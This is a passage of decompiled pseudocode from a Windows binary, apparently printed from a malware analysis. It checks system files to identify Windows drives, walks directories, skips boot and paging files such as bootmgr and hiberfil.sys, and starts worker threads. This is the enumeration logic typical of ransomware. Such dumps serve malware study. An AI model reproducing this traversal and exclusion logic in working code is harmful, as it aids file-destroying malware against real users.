                                                                    									 *((intOrPtr*)(_t1548 + 0x14)) = 7;
                                                                    									 *_t1548 = 0;
                                                                    								}
                                                                    								_v16 = 0x14;
                                                                    								E00E59AF0(_t1286,  &_v1052, _t1503);
                                                                    								_t1529 = _v92;
                                                                    								_t1503 = _v112;
                                                                    							}
                                                                    							__eflags = _t1529 - 8;
                                                                    							_t1297 =  >=  ? _t1503 :  &_v112;
                                                                    							_t882 = E00E591D0( >=  ? _t1503 :  &_v112, _v96,  >=  ? _t1503 :  &_v112, "\\", 1);
                                                                    							_t1578 = _t1579 + 0xc;
                                                                    							__eflags = _t1529 - 8;
                                                                    							_t1299 =  >=  ? _t1503 :  &_v112;
                                                                    							 *((short*)(( >=  ? _t1503 :  &_v112) + _t882 * 2)) = 0x2d;
                                                                    						} else {
                                                                    							_push(1);
                                                                    							_t1529 = E00E59040(_t1286,  &_v112,  &_v1052, 0);
                                                                    							_v16 = 0x15;
                                                                    							if( &_v112 != _t1529) {
                                                                    								E00E59AF0(_t1286,  &_v112, _t1503);
                                                                    								asm("movups xmm0, [esi]");
                                                                    								asm("movups [ebp-0x64], xmm0");
                                                                    								asm("movq xmm0, [esi+0x10]");
                                                                    								asm("movq [ebp-0x54], xmm0");
                                                                    								 *(_t1529 + 0x10) = 0;
                                                                    								 *((intOrPtr*)(_t1529 + 0x14)) = 7;
                                                                    								 *_t1529 = 0;
                                                                    							}
                                                                    							_v16 = 0x14;
                                                                    							E00E59AF0(_t1286,  &_v1052, _t1503);
                                                                    						}
                                                                    						_push( &_v112);
                                                                    						_t884 = E00E73EF0(_t1286,  &_v1124, L"started exploring on ");
                                                                    						_t1580 = _t1578 + 4;
                                                                    						_v16 = 0x17;
                                                                    						if( *((intOrPtr*)(_t884 + 0x14)) >= 8) {
                                                                    							_t884 =  *_t884;
                                                                    						}
                                                                    						_t1465 = 1;
                                                                    						E00E59EB0(_t1286, _t884, 1, _t1503, _t1529);
                                                                    						_v16 = 0x14;
                                                                    						E00E59AF0(_t1286,  &_v1124, _t1503);
                                                                    						_v33 = 0;
                                                                    						_t1304 =  >=  ?  *0xf29218 : 0xf29218;
                                                                    						_t888 =  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8;
                                                                    						_t889 = E00EAEC6F(_t1503, _t1529,  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8,  >=  ?  *0xf29218 : 0xf29218);
                                                                    						_t1581 = _t1580 + 8;
                                                                    						if(_t889 == 0) {
                                                                    							L100:
                                                                    							_v33 = 1;
                                                                    						} else {
                                                                    							if(_v33 == 0) {
                                                                    								_push(L"\\Windows\\System32\\KernelBase.dll");
                                                                    								_t1160 = E00E73CB0(_t1286,  &_v1148, _t1286 + 8, 0);
                                                                    								_t1601 = _t1581 + 4;
                                                                    								_v16 = 0x18;
                                                                    								if(_t1160[0xa] >= 8) {
                                                                    									_t1160 =  *_t1160;
                                                                    								}
                                                                    								GetFileAttributesW(_t1160);
                                                                    								_v16 = 0x14;
                                                                    								E00E59AF0(_t1286,  &_v1148, 0);
                                                                    								_push(L"\\Windows\\System32\\user32.dll");
                                                                    								_t1503 =  !=  ? 1 : 0;
                                                                    								_t1164 = E00E73CB0(_t1286,  &_v1172, _t1286 + 8, _t1503);
                                                                    								_t1602 = _t1601 + 4;
                                                                    								_v16 = 0x19;
                                                                    								if(_t1164[0xa] >= 8) {
                                                                    									_t1164 =  *_t1164;
                                                                    								}
                                                                    								_t1165 = GetFileAttributesW(_t1164);
                                                                    								_v16 = 0x14;
                                                                    								E00E59AF0(_t1286,  &_v1172, _t1503);
                                                                    								if(_t1165 != 0xffffffff) {
                                                                    									_t1503 = _t1503 + 1;
                                                                    								}
                                                                    								_push(L"\\Windows\\win.ini");
                                                                    								_t1167 = E00E73CB0(_t1286,  &_v1196, _t1286 + 8, _t1503);
                                                                    								_t1603 = _t1602 + 4;
                                                                    								_v16 = 0x1a;
                                                                    								if(_t1167[0xa] >= 8) {
                                                                    									_t1167 =  *_t1167;
                                                                    								}
                                                                    								_t1168 = GetFileAttributesW(_t1167);
                                                                    								_v16 = 0x14;
                                                                    								E00E59AF0(_t1286,  &_v1196, _t1503);
                                                                    								if(_t1168 != 0xffffffff) {
                                                                    									_t1503 = _t1503 + 1;
                                                                    								}
                                                                    								_push(L"\\users\\Default User");
                                                                    								_t1170 = E00E73CB0(_t1286,  &_v1220, _t1286 + 8, _t1503);
                                                                    								_t1604 = _t1603 + 4;
                                                                    								_v16 = 0x1b;
                                                                    								if(_t1170[0xa] >= 8) {
                                                                    									_t1170 =  *_t1170;
                                                                    								}
                                                                    								_t1171 = GetFileAttributesW(_t1170);
                                                                    								_v16 = 0x14;
                                                                    								E00E59AF0(_t1286,  &_v1220, _t1503);
                                                                    								if(_t1171 != 0xffffffff) {
                                                                    									_t1503 = _t1503 + 1;
                                                                    								}
                                                                    								_push(L"\\ProgramData\\Microsoft\\Windows\\SystemData");
                                                                    								_t1465 = _t1286 + 8;
                                                                    								_t1173 = E00E73CB0(_t1286,  &_v1340, _t1286 + 8, _t1503);
                                                                    								_t1581 = _t1604 + 4;
                                                                    								_v16 = 0x1c;
                                                                    								if(_t1173[0xa] >= 8) {
                                                                    									_t1173 =  *_t1173;
                                                                    								}
                                                                    								_t1174 = GetFileAttributesW(_t1173);
                                                                    								_t1529 = _t1174;
                                                                    								_v16 = 0x14;
                                                                    								E00E59AF0(_t1286,  &_v1340, _t1503);
                                                                    								if(_t1174 != 0xffffffff) {
                                                                    									_t1503 = _t1503 + 1;
                                                                    								}
                                                                    								if(_t1503 > 3) {
                                                                    									goto L100;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_t1306 =  >=  ?  *0xf29218 : 0xf29218;
                                                                    						_t891 =  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8;
                                                                    						_t892 = E00EAEC6F(_t1503, _t1529,  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8,  >=  ?  *0xf29218 : 0xf29218);
                                                                    						_t1582 = _t1581 + 8;
                                                                    						if(_t892 != 0 && _v33 != 0) {
                                                                    							_push(_t1286 + 8);
                                                                    							_t1155 = E00E73EF0(_t1286,  &_v1268, L"treating path ");
                                                                    							_v16 = 0x1d;
                                                                    							_t1156 = E00E59140( &_v1244, _t1155, L"as windows drive");
                                                                    							_t1582 = _t1582 + 8;
                                                                    							_v16 = 0x1e;
                                                                    							_t1684 =  *((intOrPtr*)(_t1156 + 0x14)) - 8;
                                                                    							if( *((intOrPtr*)(_t1156 + 0x14)) >= 8) {
                                                                    								_t1156 =  *_t1156;
                                                                    							}
                                                                    							_t1465 = 1;
                                                                    							E00E59EB0(_t1286, _t1156, 1, _t1503, _t1529);
                                                                    							_v16 = 0x1d;
                                                                    							E00E59AF0(_t1286,  &_v1244, _t1503);
                                                                    							_v16 = 0x14;
                                                                    							E00E59AF0(_t1286,  &_v1268, _t1503);
                                                                    						}
                                                                    						E00E71920( &_v172, _t1286 + 8);
                                                                    						_v16 = 0x1f;
                                                                    						E00E59260( &_v172, L"\\*");
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						asm("movlpd [ebp-0x30], xmm0");
                                                                    						_push(0x20);
                                                                    						_v60 = 0;
                                                                    						_v56 = 0;
                                                                    						_t896 = E00EA76B3(_t1286, _t1465, _t1503, _t1529, _t1684);
                                                                    						_t1583 = _t1582 + 4;
                                                                    						 *_t896 = _t896;
                                                                    						 *((intOrPtr*)(_t896 + 4)) = _t896;
                                                                    						_v60 = _t896;
                                                                    						_v16 = 0x20;
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						asm("movq [ebp-0x28], xmm0");
                                                                    						_v44 = 0;
                                                                    						_v52 = 0;
                                                                    						_v48 = 0;
                                                                    						_v44 = 0;
                                                                    						_v16 = 0x21;
                                                                    						_t898 =  >=  ? _v172 :  &_v172;
                                                                    						_t899 = FindFirstFileW( >=  ? _v172 :  &_v172,  &_v844);
                                                                    						_v884 = _t899;
                                                                    						if(_t899 != 0xffffffff) {
                                                                    							do {
                                                                    								_t1504 =  &(_v844.cFileName);
                                                                    								_t1466 = _v844.dwFileAttributes;
                                                                    								_t901 = 0 + _v844.nFileSizeLow;
                                                                    								__eflags = _t901;
                                                                    								_v252 = _t1466;
                                                                    								asm("adc ecx, 0x0");
                                                                    								_v244 = _t901;
                                                                    								_v240 = _v844.nFileSizeHigh;
                                                                    								_t1311 = _t1504 + 2;
                                                                    								_v872 = _t1466;
                                                                    								_v236 = _v844.dwReserved0;
                                                                    								_v232 = 0;
                                                                    								do {
                                                                    									_t903 =  *_t1504;
                                                                    									_t1504 = _t1504 + 2;
                                                                    									__eflags = _t903;
                                                                    								} while (_t903 != 0);
                                                                    								_t1505 = _t1504 - _t1311;
                                                                    								__eflags = _t1505;
                                                                    								_t1506 = _t1505 >> 1;
                                                                    								_v876 = _t1506;
                                                                    								_t904 = _t1506 + 1;
                                                                    								_v848 = _t904;
                                                                    								_t1507 = _t904;
                                                                    								do {
                                                                    									_t905 = _t1507;
                                                                    									_t1468 = _t905 * 2 >> 0x20;
                                                                    									_push( ~(0 | __eflags > 0x00000000) | _t905 * 0x00000002);
                                                                    									_t1530 = E00EAEBCD();
                                                                    									_t1583 = _t1583 + 4;
                                                                    									__eflags = _t1530;
                                                                    								} while (__eflags == 0);
                                                                    								_t1508 = _v876;
                                                                    								_t1316 = 2 + _v876 * 2;
                                                                    								E00EA90F0(_t1530,  &(_v844.cFileName), _t1316);
                                                                    								_t1577 = _t1583 + 0xc;
                                                                    								_v232 = _t1530;
                                                                    								_v16 = 0x24;
                                                                    								__eflags = _v872 & 0x00000010;
                                                                    								if((_v872 & 0x00000010) == 0) {
                                                                    									__eflags = _v56 - 0x7ffffff;
                                                                    									_t1509 = _v60;
                                                                    									if(__eflags == 0) {
                                                                    										goto L233;
                                                                    									} else {
                                                                    										_v976 = 0;
                                                                    										_v980 =  &_v60;
                                                                    										_v16 = 0x25;
                                                                    										_push(0x20);
                                                                    										_v976 = 0;
                                                                    										_t1535 = E00EA76B3(_t1286, _t1468, _t1509, _t1530, __eflags);
                                                                    										_t1577 = _t1577 + 4;
                                                                    										_v976 = _t1535;
                                                                    										_t444 =  &(_t1535[2]); // 0x8
                                                                    										E00E648A0(_t444,  &_v252);
                                                                    										_v16 = 0x26;
                                                                    										_t446 =  &_v56;
                                                                    										 *_t446 = _v56 + 1;
                                                                    										__eflags =  *_t446;
                                                                    										_t955 =  *(_t1509 + 4);
                                                                    										 *_t1535 = _t1509;
                                                                    										_t1535[1] = _t955;
                                                                    										 *(_t1509 + 4) = _t1535;
                                                                    										_v976 = 0;
                                                                    										 *_t955 = _t1535;
                                                                    										_v16 = 0x24;
                                                                    										goto L147;
                                                                    									}
                                                                    								} else {
                                                                    									_t1391 = ".";
                                                                    									_t1128 = _t1530;
                                                                    									while(1) {
                                                                    										_t1488 =  *_t1128;
                                                                    										__eflags = _t1488 -  *_t1391;
                                                                    										if(_t1488 !=  *_t1391) {
                                                                    											break;
                                                                    										}
                                                                    										__eflags = _t1488;
                                                                    										if(_t1488 == 0) {
                                                                    											L131:
                                                                    											_t1129 = 0;
                                                                    										} else {
                                                                    											_t1490 =  *((intOrPtr*)(_t1128 + 2));
                                                                    											_t426 =  &(_t1391[2]); // 0x5d0000
                                                                    											__eflags = _t1490 -  *_t426;
                                                                    											if(_t1490 !=  *_t426) {
                                                                    												break;
                                                                    											} else {
                                                                    												_t1128 = _t1128 + 4;
                                                                    												_t1391 =  &(_t1391[4]);
                                                                    												__eflags = _t1490;
                                                                    												if(_t1490 != 0) {
                                                                    													continue;
                                                                    												} else {
                                                                    													goto L131;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										L133:
                                                                    										__eflags = _t1129;
                                                                    										if(_t1129 != 0) {
                                                                    											_t1130 = L"..";
                                                                    											while(1) {
                                                                    												_t1392 =  *_t1530;
                                                                    												__eflags = _t1392 -  *_t1130;
                                                                    												if(_t1392 !=  *_t1130) {
                                                                    													break;
                                                                    												}
                                                                    												__eflags = _t1392;
                                                                    												if(_t1392 == 0) {
                                                                    													L139:
                                                                    													_t1131 = 0;
                                                                    												} else {
                                                                    													_t1395 =  *((intOrPtr*)(_t1530 + 2));
                                                                    													_t428 = _t1130 + 2; // 0x2e
                                                                    													__eflags = _t1395 -  *_t428;
                                                                    													if(_t1395 !=  *_t428) {
                                                                    														break;
                                                                    													} else {
                                                                    														_t1530 = _t1530 + 4;
                                                                    														_t1130 = _t1130 + 4;
                                                                    														__eflags = _t1395;
                                                                    														if(_t1395 != 0) {
                                                                    															continue;
                                                                    														} else {
                                                                    															goto L139;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    												L141:
                                                                    												__eflags = _t1131;
                                                                    												if(_t1131 != 0) {
                                                                    													_t1132 = _v48;
                                                                    													_push( &_v252);
                                                                    													__eflags = _t1132 - _v44;
                                                                    													if(_t1132 == _v44) {
                                                                    														_push(_t1132);
                                                                    														E00E75120(_t1286,  &_v52, _t1508, _t1530);
                                                                    													} else {
                                                                    														E00E750C0(_t1132);
                                                                    														_t1577 = _t1577 + 4;
                                                                    														_v48 = _v48 + 0x18;
                                                                    													}
                                                                    												}
                                                                    												goto L147;
                                                                    											}
                                                                    											asm("sbb eax, eax");
                                                                    											_t1131 = _t1130 | 0x00000001;
                                                                    											__eflags = _t1131;
                                                                    											goto L141;
                                                                    										}
                                                                    										goto L147;
                                                                    									}
                                                                    									asm("sbb eax, eax");
                                                                    									_t1129 = _t1128 | 0x00000001;
                                                                    									__eflags = _t1129;
                                                                    									goto L133;
                                                                    								}
                                                                    								goto L258;
                                                                    								L147:
                                                                    								_t1512 = _v884;
                                                                    								_t957 = FindNextFileW(_t1512,  &_v844);
                                                                    								_t1536 = _t957;
                                                                    								_v16 = 0x21;
                                                                    								E00EAEBD8(_v232);
                                                                    								_t1583 = _t1577 + 4;
                                                                    								__eflags = _t957;
                                                                    							} while (_t957 != 0);
                                                                    							_t959 = GetLastError();
                                                                    							__eflags = _t959 - 0x12;
                                                                    							if(_t959 != 0x12) {
                                                                    								_t1121 = E00E83430(_t1286,  &_v1016, GetLastError(), _t1512, _t1536);
                                                                    								_v16 = 0x28;
                                                                    								_t1122 = E00E59140( &_v1292, _t1121, L"in Exploreing Folder");
                                                                    								_v16 = 0x29;
                                                                    								_t1123 = E00E743F0( &_v1076, _t1122,  &_v172);
                                                                    								_t1583 = _t1583 + 8;
                                                                    								_v16 = 0x2a;
                                                                    								__eflags =  *((intOrPtr*)(_t1123 + 0x14)) - 8;
                                                                    								if( *((intOrPtr*)(_t1123 + 0x14)) >= 8) {
                                                                    									_t1123 =  *_t1123;
                                                                    								}
                                                                    								E00E59EB0(_t1286, _t1123, 1, _t1512, _t1536);
                                                                    								_v16 = 0x29;
                                                                    								E00E59AF0(_t1286,  &_v1076, _t1512);
                                                                    								_v16 = 0x28;
                                                                    								E00E59AF0(_t1286,  &_v1292, _t1512);
                                                                    								_v16 = 0x21;
                                                                    								E00E59AF0(_t1286,  &_v1016, _t1512);
                                                                    							}
                                                                    							FindClose(_t1512);
                                                                    							goto L153;
                                                                    						} else {
                                                                    							if(GetLastError() != 5) {
                                                                    								L153:
                                                                    								_t962 = _v156 - 1;
                                                                    								__eflags = _v152 - 8;
                                                                    								_v156 = _t962;
                                                                    								_t1333 =  >=  ? _v172 :  &_v172;
                                                                    								_t1468 = 0;
                                                                    								( >=  ? _v172 :  &_v172)[_t962] = 0;
                                                                    								_t1509 = _v60;
                                                                    								_v876 = _t1509;
                                                                    								_t1530 =  *_t1509;
                                                                    								__eflags = _t1530 - _t1509;
                                                                    								if(_t1530 == _t1509) {
                                                                    									L197:
                                                                    									E00E6EB00( &_v60);
                                                                    									_t1316 = _v40 + _v40 * 2;
                                                                    									_t965 =  *0xf2c120; // 0x0
                                                                    									_t967 = E00EA5E4B( *((intOrPtr*)( *((intOrPtr*)(_t965 + _t1316 * 4)) + 0x14)));
                                                                    									_t1577 = _t1583 + 4;
                                                                    									__eflags = _t967;
                                                                    									if(_t967 != 0) {
                                                                    										goto L232;
                                                                    									} else {
                                                                    										__eflags =  *((intOrPtr*)(_t1286 + 0x1c)) - 8;
                                                                    										_t970 =  *0xf2c0fc; // 0x0
                                                                    										_t1537 =  *((intOrPtr*)(_t970 + (_v40 + _v40 * 2) * 4));
                                                                    										_t972 =  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8;
                                                                    										E00E59D30( &_v880,  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8);
                                                                    										_v16 = 0x35;
                                                                    										_t660 = _t1537 + 0x28; // 0x28
                                                                    										E00E6F0E0(_t1286, _t660, _t1468,  &_v880);
                                                                    										_v16 = 0x21;
                                                                    										E00EAEBD8(_v880);
                                                                    										_t1316 = _v40 + _v40 * 2;
                                                                    										_t978 =  *0xf2c120; // 0x0
                                                                    										E00EA5E5C( *((intOrPtr*)( *((intOrPtr*)(_t978 + _t1316 * 4)) + 0x14)));
                                                                    										_t1588 = _t1577 + 8;
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										asm("movq [ebp-0x70], xmm0");
                                                                    										_v116 = 0;
                                                                    										_v188 = 0;
                                                                    										_v64 = 0;
                                                                    										_v184 = (_v48 - _v52 >> 3) * 0xaaaaaaab;
                                                                    										_v124 = 0;
                                                                    										_v120 = 0;
                                                                    										_v116 = 0;
                                                                    										_v16 = 0x36;
                                                                    										_v1020 =  &_v188;
                                                                    										_v1016 =  &_v184;
                                                                    										_v1012 =  &_v52;
                                                                    										_v1008 =  &_v64;
                                                                    										_v1004 =  &_v33;
                                                                    										_v1000 =  &_v172;
                                                                    										_v192 = 0;
                                                                    										_v16 = 0x37;
                                                                    										asm("movups xmm0, [ebp-0x3f0]");
                                                                    										_v200 =  &_v40;
                                                                    										_v228 = 0xed9a48;
                                                                    										asm("movups [ebp-0xd4], xmm0");
                                                                    										_v192 =  &_v228;
                                                                    										asm("movq xmm0, [ebp-0x3e0]");
                                                                    										asm("movq [ebp-0xc4], xmm0");
                                                                    										_v16 = 0x38;
                                                                    										_t1538 = _v864;
                                                                    										_v880 = 0;
                                                                    										asm("o16 nop [eax+eax]");
                                                                    										while(1) {
                                                                    											_v176 = 0;
                                                                    											_v16 = 0x39;
                                                                    											_push(0x28);
                                                                    											_t1509 = E00EA76B3(_t1286, _t1468, _t1509, _t1538, __eflags);
                                                                    											_t1589 = _t1588 + 4;
                                                                    											_v940 = _t1509;
                                                                    											_v16 = 0x3a;
                                                                    											_v944 = _t1509;
                                                                    											_v992 = _t1509;
                                                                    											 *(_t1509 + 0x24) = 0;
                                                                    											_v16 = 0x3b;
                                                                    											_t994 = _v192;
                                                                    											__eflags = _t994;
                                                                    											if(_t994 != 0) {
                                                                    												 *0xecd328(_t1509);
                                                                    												_t1316 = _v192;
                                                                    												_t1037 =  *((intOrPtr*)( *((intOrPtr*)( *_t994))))();
                                                                    												_t1538 = _v864;
                                                                    												 *(_t1509 + 0x24) = _t1037;
                                                                    											}
                                                                    											_v16 = 0x39;
                                                                    											_t1530 = _t1538 | 0x00000002;
                                                                    											_v176 = _t1509;
                                                                    											_v864 = _t1530;
                                                                    											_t996 = E00EB088C(_t1316, 0, 0, E00E7B450, _t1509, 0,  &_v896);
                                                                    											_t1577 = _t1589 + 0x18;
                                                                    											_v900 = _t996;
                                                                    											__eflags = _t996;
                                                                    											if(_t996 == 0) {
                                                                    												break;
                                                                    											}
                                                                    											_t1530 = _t1530 & 0xfffffffd;
                                                                    											_v176 = 0;
                                                                    											_v864 = _t1530;
                                                                    											_v16 = 0x3f;
                                                                    											_t1468 = _v120;
                                                                    											__eflags = _t1468 - _v116;
                                                                    											if(_t1468 == _v116) {
                                                                    												_push( &_v900);
                                                                    												_t1316 =  &_v124;
                                                                    												E00E759E0(_t1286, _t1316, _t1509, _t1530, _t1468);
                                                                    											} else {
                                                                    												asm("xorps xmm0, xmm0");
                                                                    												_t1316 = _v896;
                                                                    												asm("movlpd [ebp-0x378], xmm0");
                                                                    												 *_t1468 = _v900;
                                                                    												 *(_t1468 + 4) = _t1316;
                                                                    												_v120 = _v120 + 8;
                                                                    											}
                                                                    											_v16 = 0x38;
                                                                    											__eflags = _v896;
                                                                    											if(__eflags != 0) {
                                                                    												goto L237;
                                                                    											} else {
                                                                    												_t1002 = _v880 + 1;
                                                                    												_v880 = _t1002;
                                                                    												__eflags = _t1002 - 7;
                                                                    												if(__eflags < 0) {
                                                                    													continue;
                                                                    												} else {
                                                                    													_t1530 = _v124;
                                                                    													_t1509 = _v120;
                                                                    													__eflags = _t1530 - _t1509;
                                                                    													if(_t1530 == _t1509) {
                                                                    														L213:
                                                                    														__eflags = _v64 - 1;
                                                                    														if(_v64 == 1) {
                                                                    															__eflags = _v33;
                                                                    															if(_v33 == 0) {
                                                                    																_push( &_v112);
                                                                    																_t1031 = E00E73EF0(_t1286,  &_v1316, L"skipped boot/grub/efi folder at ");
                                                                    																_t1577 = _t1577 + 4;
                                                                    																_v16 = 0x40;
                                                                    																__eflags =  *((intOrPtr*)(_t1031 + 0x14)) - 8;
                                                                    																if( *((intOrPtr*)(_t1031 + 0x14)) >= 8) {
                                                                    																	_t1031 =  *_t1031;
                                                                    																}
                                                                    																_t1468 = 1;
                                                                    																E00E59EB0(_t1286, _t1031, 1, _t1509, _t1530);
                                                                    																_v16 = 0x38;
                                                                    																E00E59AF0(_t1286,  &_v1316, _t1509);
                                                                    															}
                                                                    														}
                                                                    														_v16 = 0x36;
                                                                    														_t1503 = _v192;
                                                                    														__eflags = _t1503;
                                                                    														if(_t1503 != 0) {
                                                                    															_t1530 =  *( *_t1503 + 0x10);
                                                                    															_t1026 =  &_v228;
                                                                    															__eflags = _t1503 - _t1026;
                                                                    															_t753 = _t1503 != _t1026;
                                                                    															__eflags = _t753;
                                                                    															 *0xecd328(_t1026 & 0xffffff00 | _t753);
                                                                    															 *( *( *_t1503 + 0x10))();
                                                                    															_v192 = 0;
                                                                    														}
                                                                    														_v16 = 0x21;
                                                                    														E00E6F290(_t1286,  &_v124, _t1503, _t1530);
                                                                    														_v16 = 0x20;
                                                                    														_t1539 = _v52;
                                                                    														__eflags = _t1539;
                                                                    														if(_t1539 != 0) {
                                                                    															_t1503 = _v48;
                                                                    															__eflags = _t1539 - _t1503;
                                                                    															if(_t1539 != _t1503) {
                                                                    																do {
                                                                    																	E00EAEBD8( *((intOrPtr*)(_t1539 + 0x14)));
                                                                    																	_t1539 = _t1539 + 0x18;
                                                                    																	_t1577 = _t1577 + 4;
                                                                    																	__eflags = _t1539 - _t1503;
                                                                    																} while (_t1539 != _t1503);
                                                                    																_t1539 = _v52;
                                                                    															}
                                                                    															__eflags = (_v44 - _t1539 >> 3) * 0xaaaaaaab;
                                                                    															E00E733D0(_t1286, _t1503, _t1539, (_v44 - _t1539 >> 3) * 0xaaaaaaab);
                                                                    															_v52 = 0;
                                                                    															_v48 = 0;
                                                                    															_v44 = 0;
                                                                    														}
                                                                    														_v16 = 0x1f;
                                                                    														E00E6EB90( &_v60);
                                                                    														_v16 = 0x14;
                                                                    														E00E59AF0(_t1286,  &_v172, _t1503);
                                                                    														__eflags = _v33;
                                                                    														if(__eflags == 0) {
                                                                    															goto L120;
                                                                    														} else {
                                                                    															_v64 = E00EA76B3(_t1286, _t1468, _t1503, _t1539, __eflags);
                                                                    															_v16 = 0x42;
                                                                    															_v180 = 0;
                                                                    															_v16 = 0x43;
                                                                    															_t1541 = E00EA76B3(_t1286, _t1468, _t1503, _t1539, __eflags, 0x20, 8);
                                                                    															_v940 = _t1541;
                                                                    															_v16 = 0x44;
                                                                    															_t1316 = _t1541;
                                                                    															_v944 = _t1541;
                                                                    															E00E71920(_t1316, _t1286 + 8);
                                                                    															_v16 = 0x47;
                                                                    															 *((intOrPtr*)(_t1541 + 0x18)) = _v40;
                                                                    															_v16 = 0x48;
                                                                    															 *((intOrPtr*)(_t1541 + 0x1c)) = 0xe65ae0;
                                                                    															_v16 = 0x43;
                                                                    															_t1509 = _v864 | 0x00000004;
                                                                    															_v180 = _t1541;
                                                                    															_v864 = _t1509;
                                                                    															_t912 = E00EB088C(_t1316, 0, 0,  &M00E7B530, _t1541, 0, _v64 + 4);
                                                                    															_t1530 = _v64;
                                                                    															_t1577 = _t1577 + 0x20;
                                                                    															 *_t1530 = _t912;
                                                                    															__eflags = _t912;
                                                                    															if(__eflags == 0) {
                                                                    																goto L236;
                                                                    															} else {
                                                                    																_v180 = 0;
                                                                    																_v864 = _t1509 & 0xfffffffb;
                                                                    																_v16 = 0x14;
                                                                    																_t1017 = _v948;
                                                                    																__eflags = _t1017[1] - 0x15555555;
                                                                    																_t1509 =  *_t1017;
                                                                    																if(__eflags == 0) {
                                                                    																	goto L233;
                                                                    																} else {
                                                                    																	_v988 = _t1017;
                                                                    																	_v984 = 0;
                                                                    																	_v16 = 0x4e;
                                                                    																	_push(0xc);
                                                                    																	_v984 = 0;
                                                                    																	_t1018 = E00EA76B3(_t1286, _t1468, _t1509, _t1530, __eflags);
                                                                    																	_v984 = _t1018;
                                                                    																	_t1018[2] = _t1530;
                                                                    																	_v16 = 0x4f;
                                                                    																	_v984 = 0;
                                                                    																	 *((intOrPtr*)(_v948 + 4)) = _v948[1] + 1;
                                                                    																	_t1348 =  *(_t1509 + 4);
                                                                    																	 *_t1018 = _t1509;
                                                                    																	_t1018[1] = _t1348;
                                                                    																	 *(_t1509 + 4) = _t1018;
                                                                    																	 *_t1348 = _t1018;
                                                                    																	_v16 = 0x14;
                                                                    																	goto L120;
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													} else {
                                                                    														do {
                                                                    															__eflags =  *(_t1530 + 4);
                                                                    															if( *(_t1530 + 4) == 0) {
                                                                    																goto L212;
                                                                    															} else {
                                                                    																__eflags =  *(_t1530 + 4) - GetCurrentThreadId();
                                                                    																if(__eflags == 0) {
                                                                    																	goto L235;
                                                                    																} else {
                                                                    																	_t910 = E00EA5FEC(_t1316,  *_t1530,  *(_t1530 + 4), 0);
                                                                    																	_t1577 = _t1577 + 0xc;
                                                                    																	__eflags = _t910;
                                                                    																	if(__eflags != 0) {
                                                                    																		goto L234;
                                                                    																	} else {
                                                                    																		 *_t1530 = _t910;
                                                                    																		 *(_t1530 + 4) = _t910;
                                                                    																		goto L212;
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    															goto L258;
                                                                    															L212:
                                                                    															_t1530 = _t1530 + 8;
                                                                    															__eflags = _t1530 - _t1509;
                                                                    														} while (_t1530 != _t1509);
                                                                    														goto L213;
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											goto L258;
                                                                    										}
                                                                    										_v896 = 0;
                                                                    										E00EA5F7A(_t996, _t1286, _t1468, _t1509, _t1530, 6);
                                                                    										goto L230;
                                                                    									}
                                                                    								} else {
                                                                    									asm("o16 nop [eax+eax]");
                                                                    									do {
                                                                    										_t1038 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"bootmgr");
                                                                    										_t1583 = _t1583 + 8;
                                                                    										__eflags = _t1038;
                                                                    										if(_t1038 == 0) {
                                                                    											goto L196;
                                                                    										} else {
                                                                    											_t1039 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"bootnxt");
                                                                    											_t1583 = _t1583 + 8;
                                                                    											__eflags = _t1039;
                                                                    											if(_t1039 == 0) {
                                                                    												goto L196;
                                                                    											} else {
                                                                    												_t1040 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"bootmgr.efi");
                                                                    												_t1583 = _t1583 + 8;
                                                                    												__eflags = _t1040;
                                                                    												if(_t1040 == 0) {
                                                                    													goto L196;
                                                                    												} else {
                                                                    													_t1041 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"BOOTSECT.BAK");
                                                                    													_t1583 = _t1583 + 8;
                                                                    													__eflags = _t1041;
                                                                    													if(_t1041 == 0) {
                                                                    														goto L196;
                                                                    													} else {
                                                                    														_t1042 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"pagefile.sys");
                                                                    														_t1583 = _t1583 + 8;
                                                                    														__eflags = _t1042;
                                                                    														if(_t1042 == 0) {
                                                                    															goto L196;
                                                                    														} else {
                                                                    															_t1043 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"swapfile.sys");
                                                                    															_t1583 = _t1583 + 8;
                                                                    															__eflags = _t1043;
                                                                    															if(_t1043 == 0) {
                                                                    																goto L196;
                                                                    															} else {
                                                                    																_t1044 = E00EAEC6F(_t1509, _t1530,  *((intOrPtr*)(_t1530 + 0x1c)), L"hiberfil.sys");
                                                                    																_t1583 = _t1583 + 8;
                                                                    																__eflags = _t1044;
                                                                    																if(_t1044 == 0) {
                                                                    																	goto L196;
                                                                    																} else {
                                                                    																	_t1477 =  *((intOrPtr*)(_t1530 + 0x1c));
                                                                    																	_t1354 = _t1477;
                                                                    																	_v852 = _t1477;
                                                                    																	_v848 = _t1354 + 2;
                                                                    																	do {
                                                                    																		_t1046 =  *_t1354;
                                                                    																		_t1354 = _t1354 + 2;
                                                                    																		__eflags = _t1046;
                                                                    																	} while (_t1046 != 0);
                                                                    																	_t1356 = _t1354 - _v848 >> 1;
                                                                    																	_v868 = _t1356;
                                                                    																	_t1047 = _t1356 - 1;
                                                                    																	__eflags = _t1047;
                                                                    																	if(__eflags != 0) {
                                                                    																		_t1480 = _t1477 + _t1047 * 2;
                                                                    																		while(1) {
                                                                    																			__eflags =  *_t1480 - 0x2e;
                                                                    																			if( *_t1480 == 0x2e) {
                                                                    																				break;
